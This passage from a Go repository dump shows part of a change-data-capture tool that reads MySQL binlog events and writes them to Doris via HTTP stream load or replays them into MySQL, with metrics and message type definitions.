mi.inSchema.GetTable(e.Table.Schema, e.Table.Name) 407 | if err != nil { 408 | log.Fatalf("get tables failed, err: %v", err.Error()) 409 | } 410 | if len(row) != len(ta.Columns) { 411 | log.Warnf("delete %s.%s columns and data mismatch in local length: %d vs %d, table %v", 412 
| e.Table.Schema, e.Table.Name, len(ta.Columns), len(row), ta.GetTableColumnsName()) 413 | } 414 | for j := 0; j < len(row); j++ { 415 | data[ta.Columns[j].Name] = deserializeForLocal(row[j], ta.Columns[j]) 416 | } 417 | } else { 418 | for j := 0; j < len(row); j++ { 419 | data[e.Table.Columns[j].Name] = deserialize(row[j], e.Table.Columns[j]) 420 | } 421 | } 422 | 423 | log.Debugf("msg event: %s %s.%s %v\n", e.Action, e.Table.Schema, e.Table.Name, data) 424 | msgs = append(msgs, &msg.Msg{ 425 | Table: e.Table.Name, 426 | Database: e.Table.Schema, 427 | Type: msg.MsgDML, 428 | DmlMsg: &msg.DMLMsg{Action: msg.DeleteAction, Data: data}, 429 | Timestamp: time.Unix(int64(e.Header.Timestamp), 0), 430 | PluginName: msg.MysqlPlugin, 431 | }) 432 | 433 | } 434 | return msgs 435 | } 436 | log.Fatalf("msg actionType: %s not found") 437 | return nil 438 | } 439 | 440 | func (mi *MysqlInputPlugin) AfterMsgCommit(msg *msg.Msg) error { 441 | ctx := msg.InputContext.(*inputContext) 442 | if ctx.BinlogGTID != "" { 443 | if err := mi.position.ModifyPosition(ctx.BinlogGTID); err != nil { 444 | return errors.Trace(err) 445 | } 446 | if ctx.force { 447 | // flush position 448 | if err := mi.position.SavePosition(); err != nil { 449 | log.Fatalf("msg event position save failed: %v", errors.ErrorStack(err)) 450 | } 451 | mi.ctlMsgFlushPosition.BinlogName = ctx.BinlogName 452 | mi.ctlMsgFlushPosition.BinlogPos = ctx.BinlogPos 453 | mi.ctlMsgFlushPosition.BinlogGTID = ctx.BinlogGTID 454 | } 455 | } else { 456 | log.Warnf("after msg commit binlog gtid is empty, no modify position! 
msg: %v", msg.InputContext) 457 | } 458 | 459 | return nil 460 | } 461 | 462 | func (mi *MysqlInputPlugin) promTimingMetrics() { 463 | mi.wg.Add(1) 464 | go func() { 465 | defer mi.wg.Done() 466 | ticker := time.NewTicker(time.Second * 3) 467 | defer ticker.Stop() 468 | 469 | for { 470 | select { 471 | case <-ticker.C: 472 | // prom sync delay set 473 | metrics.DelayReadTime.Set(float64(mi.canal.GetDelay())) 474 | case <-mi.ctx.Done(): 475 | return 476 | } 477 | } 478 | }() 479 | } 480 | -------------------------------------------------------------------------------- /pkg/input/utils.go: -------------------------------------------------------------------------------- 1 | package input 2 | 3 | import ( 4 | "github.com/go-mysql-org/go-mysql/schema" 5 | schema2 "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 6 | ) 7 | 8 | type inputContext struct { 9 | BinlogName string `toml:"binlog-name"` 10 | BinlogPos uint32 `toml:"binlog-pos"` 11 | BinlogGTID string `toml:"binlog-gtid"` 12 | force bool 13 | } 14 | 15 | func deserialize(raw interface{}, column schema.TableColumn) interface{} { 16 | if raw == nil { 17 | return nil 18 | } 19 | 20 | ret := raw 21 | if column.RawType == "text" || column.RawType == "longtext" || column.RawType == "mediumtext" || column.RawType == "json" { 22 | _, ok := raw.([]uint8) 23 | if ok { 24 | ret = string(raw.([]uint8)) 25 | } 26 | } 27 | return ret 28 | } 29 | 30 | func deserializeForLocal(raw interface{}, column schema2.TableColumn) interface{} { 31 | if raw == nil { 32 | return nil 33 | } 34 | 35 | ret := raw 36 | if column.RawType == "text" || column.RawType == "longtext" || column.RawType == "mediumtext" || column.RawType == "json" { 37 | _, ok := raw.([]uint8) 38 | if ok { 39 | ret = string(raw.([]uint8)) 40 | } 41 | } 42 | return ret 43 | } 44 | 45 | type node struct { 46 | db string 47 | table string 48 | newDb string 49 | newTable string 50 | } 51 | 
-------------------------------------------------------------------------------- /pkg/metrics/metrics.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/prometheus/client_golang/prometheus/promauto" 6 | ) 7 | 8 | var OpsStartTime = prometheus.NewGauge(prometheus.GaugeOpts{ 9 | Namespace: "go_mysql_sr", 10 | Subsystem: "start", 11 | Name: "time", 12 | Help: "go-mysql-sr startup timestamp(s).", 13 | }) 14 | 15 | var OpsReadProcessed = promauto.NewCounter(prometheus.CounterOpts{ 16 | Name: "go_mysql_sr_read_processed_ops_total", 17 | Help: "The total number of read processed events", 18 | }) 19 | 20 | var OpsWriteProcessed = promauto.NewCounter(prometheus.CounterOpts{ 21 | Name: "go_mysql_sr_write_processed_ops_total", 22 | Help: "The total number of write processed events", 23 | }) 24 | 25 | var DelayReadTime = prometheus.NewGauge(prometheus.GaugeOpts{ 26 | Namespace: "go_mysql_sr", 27 | Subsystem: "read_delay", 28 | Name: "time_seconds", 29 | Help: "Delay in seconds to read the binlog at the source.", 30 | }) 31 | 32 | var DelayWriteTime = prometheus.NewGauge(prometheus.GaugeOpts{ 33 | Namespace: "go_mysql_sr", 34 | Subsystem: "write_delay", 35 | Name: "time_seconds", 36 | Help: "Delay in seconds to write at the destination.", 37 | }) 38 | 39 | func init() { 40 | prometheus.MustRegister(OpsStartTime, DelayReadTime, DelayWriteTime) 41 | } 42 | -------------------------------------------------------------------------------- /pkg/msg/msg.go: -------------------------------------------------------------------------------- 1 | package msg 2 | 3 | import ( 4 | "github.com/pingcap/tidb/pkg/parser/ast" 5 | "time" 6 | ) 7 | 8 | type MsgType string 9 | type ActionType string 10 | type PluginName string 11 | 12 | const ( 13 | MsgDML MsgType = "dml" 14 | MsgDDL MsgType = "ddl" 15 | MsgCtl MsgType = "ctl" // control operate 16 | 17 | 
InsertAction ActionType = "insert"
	UpdateAction  ActionType = "update"
	DeleteAction  ActionType = "delete"
	ReplaceAction ActionType = "replace" // emitted by the mongo input plugin

	MysqlPlugin PluginName = "Mysql"
	MongoPlugin PluginName = "Mongo"
)

// Msg is a single change event flowing through the pipeline from an input
// plugin, through filters, to an output plugin. Exactly one of DmlMsg/DdlMsg
// is populated depending on Type; MsgCtl messages carry only position state
// in InputContext plus the ack callback.
type Msg struct {
	Database            string
	Table               string
	Type                MsgType
	DmlMsg              *DMLMsg
	DdlMsg              *DDLMsg
	PluginName          PluginName
	ResumeToken         *WatchId `bson:"_id"` // mongo change-stream resume token
	Timestamp           time.Time
	InputContext        interface{}     // input-plugin-specific position payload
	AfterCommitCallback MsgCallbackFunc // invoked by outputs after the event is committed, to ack the position
}

// DMLMsg carries row data for a DML event; Old holds the pre-image for updates.
type DMLMsg struct {
	Action ActionType
	Data   map[string]interface{}
	Old    map[string]interface{}
}

// DDLMsg carries the raw DDL statement and its parsed AST.
type DDLMsg struct {
	Statement string
	AST       ast.StmtNode
}

// WatchId is the MongoDB change-stream resume token wrapper.
type WatchId struct {
	Data string `bson:"_data"`
}

// MsgCallbackFunc is called after a message has been durably handled downstream.
type MsgCallbackFunc func(m *Msg) error
--------------------------------------------------------------------------------
/pkg/output/op_doris.go:
--------------------------------------------------------------------------------
package output

import (
	"context"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"github.com/go-mysql-org/go-mysql/client"
	"github.com/go-mysql-org/go-mysql/mysql"
	"github.com/juju/errors"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/channel"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/config"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/core"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/metrics"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/msg"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/registry"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/rule"
	"github.com/fatalclarine/go-mysql-starrocks/pkg/schema"
	"github.com/mitchellh/mapstructure"
	"github.com/siddontang/go-log/log"
	"io"
	"net/http"
	"strings"
	"sync"
	"time"
)

// Doris is the output plugin that batches events and stream-loads them into
// Apache Doris.
type Doris struct {
	*config.DorisConfig
	tableLock
sync.RWMutex 31 | tables map[string]*schema.Table 32 | ruleLock sync.RWMutex 33 | rulesMap map[string]*rule.DorisRule 34 | lastCtlMsg *msg.Msg 35 | syncTimestamp time.Time // sync chan中last event timestamp 36 | ackTimestamp time.Time // sync data ack的 event timestamp 37 | close bool 38 | connLock sync.Mutex 39 | conn *client.Conn 40 | inSchema core.Schema 41 | wg sync.WaitGroup 42 | ctx context.Context 43 | cancel context.CancelFunc 44 | pauseC chan bool 45 | resumeC chan bool 46 | paused bool 47 | } 48 | 49 | const DorisName = "doris" 50 | 51 | func init() { 52 | registry.RegisterPlugin(registry.OutputPlugin, DorisName, &Doris{}) 53 | } 54 | 55 | func (ds *Doris) Configure(pipelineName string, configOutput map[string]interface{}) error { 56 | ds.DorisConfig = &config.DorisConfig{} 57 | var target = configOutput["target"] 58 | err := mapstructure.Decode(target, ds.DorisConfig) 59 | if err != nil { 60 | log.Fatal("output.target config parsing failed. err: %v", err.Error()) 61 | } 62 | return nil 63 | } 64 | 65 | func (ds *Doris) NewOutput(outputConfig interface{}, rulesMap map[string]interface{}, inSchema core.Schema) { 66 | // init map obj 67 | ds.tables = make(map[string]*schema.Table) 68 | ds.rulesMap = make(map[string]*rule.DorisRule) 69 | 70 | ds.ctx, ds.cancel = context.WithCancel(context.Background()) 71 | 72 | ds.close = false 73 | ds.StartMetrics() 74 | var err error 75 | // init conn 76 | ds.conn, err = client.Connect(fmt.Sprintf("%s:%d", ds.Host, ds.Port), ds.UserName, ds.Password, "") 77 | if err != nil { 78 | log.Fatal("output config conn failed. 
err: ", err.Error()) 79 | } 80 | // init rulesMap 81 | if err = mapstructure.Decode(rulesMap, &ds.rulesMap); err != nil { 82 | log.Fatal(err) 83 | } 84 | ds.inSchema = inSchema 85 | ds.pauseC = make(chan bool, 1) 86 | ds.resumeC = make(chan bool, 1) 87 | ds.paused = false 88 | } 89 | 90 | func (ds *Doris) StartOutput(outputChan *channel.OutputChannel) { 91 | ds.wg.Add(1) 92 | 93 | ticker := time.NewTicker(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 94 | defer ticker.Stop() 95 | defer ds.wg.Done() 96 | 97 | eventsLen := 0 98 | schemaTableEvents := make(map[string][]*msg.Msg) 99 | for { 100 | needFlush := false 101 | select { 102 | case v := <-outputChan.SyncChan: 103 | switch data := v.(type) { 104 | case *msg.Msg: 105 | if data.Type == msg.MsgCtl { 106 | ds.lastCtlMsg = data 107 | continue 108 | } 109 | 110 | ds.syncTimestamp = data.Timestamp 111 | 112 | schemaTable := rule.RuleKeyFormat(data.Database, data.Table) 113 | rowsData, ok := schemaTableEvents[schemaTable] 114 | if !ok { 115 | schemaTableEvents[schemaTable] = make([]*msg.Msg, 0, outputChan.ChannelSize) 116 | } 117 | schemaTableEvents[schemaTable] = append(rowsData, data) 118 | eventsLen += 1 119 | 120 | if eventsLen >= outputChan.ChannelSize { 121 | needFlush = true 122 | } 123 | } 124 | case <-ds.ctx.Done(): 125 | needFlush = true 126 | log.Infof("wait last one flush output data...") 127 | ds.close = true 128 | case <-ticker.C: 129 | needFlush = true 130 | case <-ds.pauseC: 131 | ds.paused = true 132 | <-ds.resumeC 133 | select { 134 | default: 135 | ds.paused = false 136 | continue 137 | } 138 | } 139 | 140 | if needFlush { 141 | for schemaTable := range schemaTableEvents { 142 | ruleMap, ok := ds.rulesMap[schemaTable] 143 | if !ok { 144 | log.Fatalf("get ruleMap failed: %v", schemaTable) 145 | } 146 | tableObj, err := ds.inSchema.GetTable(ruleMap.SourceSchema, ruleMap.SourceTable) 147 | if err != nil { 148 | log.Fatal(err) 149 | } 150 | 151 | err = 
ds.Execute(schemaTableEvents[schemaTable], tableObj, ruleMap.TargetSchema, ruleMap.TargetTable) 152 | if err != nil { 153 | log.Fatalf("do doris bulk err %v, close sync", err) 154 | ds.cancel() 155 | return 156 | } 157 | delete(schemaTableEvents, schemaTable) 158 | } 159 | 160 | // only start lastCtlMsg is nil 161 | /*if ds.lastCtlMsg == nil { 162 | if ds.close { 163 | log.Infof("not found lastCtlMsg and output data, not last one flush.") 164 | return 165 | } else { 166 | continue 167 | } 168 | }*/ 169 | 170 | if ds.lastCtlMsg.AfterCommitCallback != nil { 171 | err := ds.lastCtlMsg.AfterCommitCallback(ds.lastCtlMsg) 172 | if err != nil { 173 | log.Fatalf("ack msg failed: %v", errors.ErrorStack(err)) 174 | } 175 | // log.Debugf("after commit callback lastCtl: %v", ds.lastCtlMsg.InputContext) 176 | } else { 177 | log.Fatalf("not found AfterCommitCallback func") 178 | } 179 | 180 | ds.ackTimestamp = ds.syncTimestamp 181 | eventsLen = 0 182 | // ticker.Reset(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 183 | if ds.close { 184 | log.Infof("last one flush output data done.") 185 | return 186 | } 187 | } 188 | } 189 | } 190 | 191 | func (ds *Doris) Execute(msgs []*msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 192 | if len(msgs) == 0 { 193 | return nil 194 | } 195 | var jsonList []string 196 | 197 | jsonList = ds.generateJSON(msgs, table) 198 | log.Debugf("doris bulk custom %s.%s row data num: %d", targetSchema, targetTable, len(jsonList)) 199 | for _, s := range jsonList { 200 | log.Debugf("doris custom %s.%s row data: %v", targetSchema, targetTable, s) 201 | } 202 | 203 | var err error 204 | for i := 0; i < RetryCount; i++ { 205 | err = ds.SendData(jsonList, table, targetSchema, targetTable, nil) 206 | if err != nil { 207 | log.Warnf("send data failed, err: %v, execute retry...", err.Error()) 208 | if i+1 == RetryCount { 209 | break 210 | } 211 | time.Sleep(time.Duration(RetryInterval*(i+1)) * time.Second) 212 | 
continue 213 | } 214 | break 215 | } 216 | return err 217 | } 218 | 219 | func (ds *Doris) Close() { 220 | ds.cancel() 221 | ds.connLock.Lock() 222 | err := ds.conn.Close() 223 | if err != nil { 224 | log.Fatalf("close doris output err: %v", err.Error()) 225 | } 226 | ds.conn = nil 227 | ds.connLock.Unlock() 228 | ds.wg.Wait() 229 | log.Infof("close doris output goroutine.") 230 | log.Infof("close doris output metrics goroutine.") 231 | } 232 | 233 | func (ds *Doris) AddRule(config map[string]interface{}) error { 234 | ds.ruleLock.Lock() 235 | defer ds.ruleLock.Unlock() 236 | dsr := &rule.DorisRule{Deleted: false} 237 | if err := mapstructure.Decode(config, dsr); err != nil { 238 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 239 | } 240 | // if exists, return 241 | ruleKey := rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable) 242 | for _, ruleObj := range ds.rulesMap { 243 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 244 | if ruleKey == tmpRuleKey { 245 | if ruleObj.Deleted { 246 | // if deleted is true, break, waiting to cover. 247 | break 248 | } 249 | return errors.New("output table rule already exists.") 250 | } 251 | } 252 | ds.rulesMap[rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable)] = dsr 253 | return nil 254 | } 255 | 256 | func (ds *Doris) DeleteRule(config map[string]interface{}) error { 257 | ds.ruleLock.Lock() 258 | defer ds.ruleLock.Unlock() 259 | dsr := &rule.DorisRule{} 260 | if err := mapstructure.Decode(config, dsr); err != nil { 261 | return errors.Trace(errors.New(fmt.Sprintf("delete rule config parsing failed. 
err: %v", err.Error()))) 262 | } 263 | // if exists delete 264 | ruleKey := rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable) 265 | for _, ruleObj := range ds.rulesMap { 266 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 267 | if ruleKey == tmpRuleKey { 268 | // delete(ds.rulesMap, ruleKey) 269 | // only mark deleted 270 | ds.rulesMap[ruleKey].Deleted = true 271 | return nil 272 | } 273 | } 274 | return errors.New("output table rule not exists.") 275 | } 276 | 277 | func (ds *Doris) GetRules() interface{} { 278 | return ds.rulesMap 279 | } 280 | 281 | func (ds *Doris) GetTable(db string, table string) (*schema.Table, error) { 282 | key := fmt.Sprintf("%s.%s", db, table) 283 | ds.tableLock.RLock() 284 | t, ok := ds.tables[key] 285 | ds.tableLock.RUnlock() 286 | if ok { 287 | return t, nil 288 | } 289 | 290 | r, err := ds.ExecuteSQL(fmt.Sprintf("show full columns from `%s`.`%s`", db, table)) 291 | if err != nil { 292 | return nil, err 293 | } 294 | ta := &schema.Table{ 295 | Schema: db, 296 | Name: table, 297 | Columns: make([]schema.TableColumn, 0, 16), 298 | } 299 | for i := 0; i < r.RowNumber(); i++ { 300 | name, _ := r.GetString(i, 0) 301 | ta.Columns = append(ta.Columns, schema.TableColumn{Name: name}) 302 | } 303 | ds.tableLock.Lock() 304 | ds.tables[key] = ta 305 | ds.tableLock.Unlock() 306 | return ta, nil 307 | } 308 | 309 | func (ds *Doris) generateJSON(msgs []*msg.Msg, table *schema.Table) []string { 310 | var jsonList []string 311 | 312 | for _, event := range msgs { 313 | // datetime 0000-00-00 00:00:00 write err handle 314 | err := ds.datetimeHandle(event, table) 315 | if err != nil { 316 | log.Fatalf("datetime type handle failed: %v", err.Error()) 317 | } 318 | 319 | switch event.DmlMsg.Action { 320 | case msg.InsertAction: 321 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 322 | event.DmlMsg.Data[DeleteColumn] = 0 323 | b, _ := json.Marshal(event.DmlMsg.Data) 324 | jsonList = append(jsonList, string(b)) 325 
| case msg.UpdateAction: 326 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 327 | event.DmlMsg.Data[DeleteColumn] = 0 328 | b, _ := json.Marshal(event.DmlMsg.Data) 329 | jsonList = append(jsonList, string(b)) 330 | case msg.DeleteAction: // starrocks2.4版本只支持primary key模型load delete 331 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 332 | event.DmlMsg.Data[DeleteColumn] = 1 333 | b, _ := json.Marshal(event.DmlMsg.Data) 334 | jsonList = append(jsonList, string(b)) 335 | case msg.ReplaceAction: // for mongo 336 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 337 | event.DmlMsg.Data[DeleteColumn] = 0 338 | b, _ := json.Marshal(event.DmlMsg.Data) 339 | jsonList = append(jsonList, string(b)) 340 | default: 341 | log.Fatalf("unhandled message type: %v", event) 342 | } 343 | } 344 | return jsonList 345 | } 346 | 347 | func (ds *Doris) SendData(content []string, table *schema.Table, targetSchema string, targetTable string, ignoreColumns []string) error { 348 | cli := &http.Client{ 349 | /** CheckRedirect: func(req *http.Request, via []*http.Request) error { 350 | req.Header.Add("Authorization", "Basic "+sr.auth()) 351 | return nil // return nil nil回重定向。 352 | }, */ 353 | } 354 | loadUrl := fmt.Sprintf("http://%s:%d/api/%s/%s/_stream_load", 355 | ds.Host, ds.LoadPort, targetSchema, targetTable) 356 | newContent := `[` + strings.Join(content, ",") + `]` 357 | req, _ := http.NewRequest("PUT", loadUrl, strings.NewReader(newContent)) 358 | 359 | // req.Header.Add 360 | req.Header.Add("Authorization", "Basic "+ds.auth()) 361 | req.Header.Add("Expect", "100-continue") 362 | req.Header.Add("strict_mode", "true") 363 | // req.Header.Add("label", "39c25a5c-7000-496e-a98e-348a264c81de") 364 | req.Header.Add("format", "json") 365 | req.Header.Add("strip_outer_array", "true") 366 | req.Header.Add("merge_type", "MERGE") 367 | req.Header.Add("delete", DeleteCondition) 368 | var columnArray []string 369 | for _, column := range table.Columns { 370 | if 
ds.isContain(ignoreColumns, column.Name) { 371 | continue 372 | } 373 | columnArray = append(columnArray, column.Name) 374 | } 375 | columnArray = append(columnArray, DeleteColumn) 376 | columns := fmt.Sprintf("%s", strings.Join(columnArray, ",")) 377 | req.Header.Add("columns", columns) 378 | 379 | response, err := cli.Do(req) 380 | if err != nil { 381 | return errors.Trace(err) 382 | } 383 | returnMap, err := ds.parseResponse(response) 384 | if returnMap["Status"] != "Success" { 385 | message := returnMap["Message"] 386 | errorUrl := returnMap["ErrorURL"] 387 | errorMsg := message.(string) + 388 | fmt.Sprintf(", targetTable: %s.%s", targetSchema, targetTable) + 389 | fmt.Sprintf(", visit ErrorURL to view error details, ErrorURL: %s", errorUrl) 390 | return errors.Trace(errors.New(errorMsg)) 391 | } 392 | // prom write event number counter 393 | numberLoadedRows := returnMap["NumberLoadedRows"] 394 | metrics.OpsWriteProcessed.Add(numberLoadedRows.(float64)) 395 | return nil 396 | } 397 | 398 | func (ds *Doris) auth() string { 399 | s := ds.UserName + ":" + ds.Password 400 | b := []byte(s) 401 | 402 | sEnc := base64.StdEncoding.EncodeToString(b) 403 | return sEnc 404 | } 405 | 406 | func (ds *Doris) isContain(items []string, item string) bool { 407 | if len(items) == 0 { 408 | return false 409 | } 410 | for _, eachItem := range items { 411 | if eachItem == item { 412 | return true 413 | } 414 | } 415 | return false 416 | } 417 | 418 | func (ds *Doris) parseResponse(response *http.Response) (map[string]interface{}, error) { 419 | var result map[string]interface{} 420 | body, err := io.ReadAll(response.Body) 421 | if err == nil { 422 | err = json.Unmarshal(body, &result) 423 | } 424 | 425 | return result, err 426 | } 427 | 428 | func (ds *Doris) StartMetrics() { 429 | ds.promTimingMetrics() 430 | } 431 | 432 | func (ds *Doris) promTimingMetrics() { 433 | ds.wg.Add(1) 434 | go func() { 435 | defer ds.wg.Done() 436 | ticker := time.NewTicker(time.Second * 3) 437 | 
defer ticker.Stop() 438 | var newDelaySeconds uint32 439 | for { 440 | select { 441 | case <-ticker.C: 442 | // prom write delay set 443 | now := time.Now() 444 | if ds.syncTimestamp.IsZero() || ds.ackTimestamp.IsZero() || ds.syncTimestamp == ds.ackTimestamp { 445 | newDelaySeconds = 0 446 | } else { 447 | newDelaySeconds = uint32(now.Sub(ds.ackTimestamp).Seconds()) 448 | } 449 | // log.Debugf("write delay %vs", newDelay) 450 | metrics.DelayWriteTime.Set(float64(newDelaySeconds)) 451 | case <-ds.ctx.Done(): 452 | return 453 | } 454 | } 455 | }() 456 | } 457 | 458 | func (ds *Doris) ExecuteSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 459 | ds.connLock.Lock() 460 | defer ds.connLock.Unlock() 461 | argF := make([]func(*client.Conn), 0) 462 | retryNum := 3 463 | for i := 0; i < retryNum; i++ { 464 | if ds.conn == nil { 465 | ds.conn, err = client.Connect(fmt.Sprintf("%s:%d", ds.Host, ds.Port), ds.UserName, ds.Password, "", argF...) 466 | if err != nil { 467 | return nil, errors.Trace(err) 468 | } 469 | } 470 | 471 | rr, err = ds.conn.Execute(cmd, args...) 
472 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 473 | return 474 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 475 | err := ds.conn.Close() 476 | if err != nil { 477 | return nil, err 478 | } 479 | ds.conn = nil 480 | continue 481 | } else { 482 | return 483 | } 484 | } 485 | return 486 | } 487 | 488 | func (ds *Doris) datetimeHandle(ev *msg.Msg, table *schema.Table) error { 489 | for _, column := range table.Columns { 490 | if column.Type == schema.TypeDatetime { 491 | if ev.DmlMsg.Data[column.Name] == "0000-00-00 00:00:00" { 492 | ev.DmlMsg.Data[column.Name] = "0000-01-01 00:00:00" 493 | } 494 | } 495 | } 496 | return nil 497 | } 498 | 499 | func (ds *Doris) Pause() error { 500 | ds.pauseC <- true 501 | return nil 502 | } 503 | 504 | func (ds *Doris) Resume() error { 505 | ds.resumeC <- true 506 | return nil 507 | } 508 | 509 | func (ds *Doris) IsPaused() bool { 510 | return ds.paused 511 | } 512 | -------------------------------------------------------------------------------- /pkg/output/op_mysql.go: -------------------------------------------------------------------------------- 1 | package output 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/go-mysql-org/go-mysql/client" 7 | "github.com/go-mysql-org/go-mysql/mysql" 8 | "github.com/juju/errors" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 17 | "github.com/mitchellh/mapstructure" 18 | "github.com/siddontang/go-log/log" 19 | "strings" 20 | "sync" 21 | "time" 22 | ) 23 | 24 | type Mysql struct { 25 | *config.MysqlConfig 26 | tableLock 
sync.RWMutex 27 | tables map[string]*schema.Table 28 | ruleLock sync.RWMutex 29 | rulesMap map[string]*rule.MysqlRule 30 | lastCtlMsg *msg.Msg 31 | syncTimestamp time.Time // sync chan中last event timestamp 32 | ackTimestamp time.Time // sync data ack的 event timestamp 33 | close bool 34 | connLock sync.Mutex 35 | conn *client.Conn 36 | inSchema core.Schema 37 | wg sync.WaitGroup 38 | ctx context.Context 39 | cancel context.CancelFunc 40 | pauseC chan bool 41 | resumeC chan bool 42 | paused bool 43 | } 44 | 45 | const MysqlName = "mysql" 46 | 47 | func init() { 48 | registry.RegisterPlugin(registry.OutputPlugin, MysqlName, &Mysql{}) 49 | } 50 | 51 | func (m *Mysql) Configure(pipelineName string, configOutput map[string]interface{}) error { 52 | m.MysqlConfig = &config.MysqlConfig{} 53 | var target = configOutput["target"] 54 | err := mapstructure.Decode(target, m.MysqlConfig) 55 | if err != nil { 56 | log.Fatal("output.target config parsing failed. err: %v", err.Error()) 57 | } 58 | return nil 59 | } 60 | 61 | func (m *Mysql) NewOutput(outputConfig interface{}, rulesMap map[string]interface{}, inSchema core.Schema) { 62 | // init map obj 63 | m.tables = make(map[string]*schema.Table) 64 | m.rulesMap = make(map[string]*rule.MysqlRule) 65 | 66 | m.ctx, m.cancel = context.WithCancel(context.Background()) 67 | 68 | m.close = false 69 | m.StartMetrics() 70 | var err error 71 | // init conn 72 | m.conn, err = client.Connect(fmt.Sprintf("%s:%d", m.Host, m.Port), m.UserName, m.Password, "") 73 | _ = m.conn.SetCharset("utf8mb4") 74 | if err != nil { 75 | log.Fatal("output config conn failed. 
err: ", err.Error()) 76 | } 77 | // init rulesMap 78 | if err = mapstructure.Decode(rulesMap, &m.rulesMap); err != nil { 79 | log.Fatal(err) 80 | } 81 | m.inSchema = inSchema 82 | m.pauseC = make(chan bool, 1) 83 | m.resumeC = make(chan bool, 1) 84 | m.paused = false 85 | } 86 | 87 | func (m *Mysql) StartOutput(outputChan *channel.OutputChannel) { 88 | m.wg.Add(1) 89 | 90 | ticker := time.NewTicker(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 91 | defer ticker.Stop() 92 | defer m.wg.Done() 93 | 94 | for { 95 | select { 96 | case v := <-outputChan.SyncChan: 97 | switch data := v.(type) { 98 | case *msg.Msg: 99 | if data.Type == msg.MsgCtl { 100 | m.lastCtlMsg = data 101 | continue 102 | } 103 | 104 | m.syncTimestamp = data.Timestamp 105 | 106 | schemaTable := rule.RuleKeyFormat(data.Database, data.Table) 107 | 108 | ruleMap, ok := m.rulesMap[schemaTable] 109 | if !ok { 110 | log.Fatalf("get ruleMap failed: %v", schemaTable) 111 | } 112 | tableObj, err := m.inSchema.GetTable(ruleMap.SourceSchema, ruleMap.SourceTable) 113 | if err != nil { 114 | log.Fatal(err) 115 | } 116 | err = m.RewriteExecute(data, tableObj, ruleMap.TargetSchema, ruleMap.TargetTable) 117 | if err != nil { 118 | log.Fatalf("do mysql sync err %v, close sync", err) 119 | m.cancel() 120 | return 121 | } 122 | } 123 | case <-m.ctx.Done(): 124 | m.close = true 125 | case <-ticker.C: 126 | case <-m.pauseC: 127 | m.paused = true 128 | <-m.resumeC 129 | select { 130 | default: 131 | m.paused = false 132 | continue 133 | } 134 | } 135 | // only start lastCtlMsg is nil 136 | if m.lastCtlMsg == nil { 137 | if m.close { 138 | log.Infof("not found lastCtlMsg and output data, not last one flush.") 139 | return 140 | } else { 141 | continue 142 | } 143 | } 144 | 145 | if m.lastCtlMsg.AfterCommitCallback != nil { 146 | err := m.lastCtlMsg.AfterCommitCallback(m.lastCtlMsg) 147 | if err != nil { 148 | log.Fatalf("ack msg failed: %v", errors.ErrorStack(err)) 149 | } 150 | // log.Debugf("after 
commit callback lastCtl: %v", m.lastCtlMsg.InputContext) 151 | } else { 152 | log.Fatalf("not found AfterCommitCallback func") 153 | } 154 | 155 | m.ackTimestamp = m.syncTimestamp 156 | if m.close { 157 | log.Infof("last one flush output data done.") 158 | return 159 | } 160 | } 161 | } 162 | 163 | func (m *Mysql) Execute(msgs []*msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 164 | return nil 165 | } 166 | 167 | func (m *Mysql) RewriteExecute(event *msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 168 | outPutSQL, args, err := m.generateSQL(event, table) 169 | log.Debugf("mysql custom row data: %v; args: %v", outPutSQL, args) 170 | if err != nil { 171 | return err 172 | } 173 | _, err = m.ExecuteSQL(outPutSQL, args...) 174 | if err != nil { 175 | return err 176 | } 177 | return nil 178 | } 179 | 180 | func (m *Mysql) Close() { 181 | m.cancel() 182 | m.connLock.Lock() 183 | err := m.conn.Close() 184 | if err != nil { 185 | log.Fatalf("close mysql output err: %v", err.Error()) 186 | } 187 | m.conn = nil 188 | m.connLock.Unlock() 189 | m.wg.Wait() 190 | log.Infof("close mysql output goroutine.") 191 | log.Infof("close mysql output metrics goroutine.") 192 | } 193 | 194 | func (m *Mysql) AddRule(config map[string]interface{}) error { 195 | m.ruleLock.Lock() 196 | defer m.ruleLock.Unlock() 197 | mr := 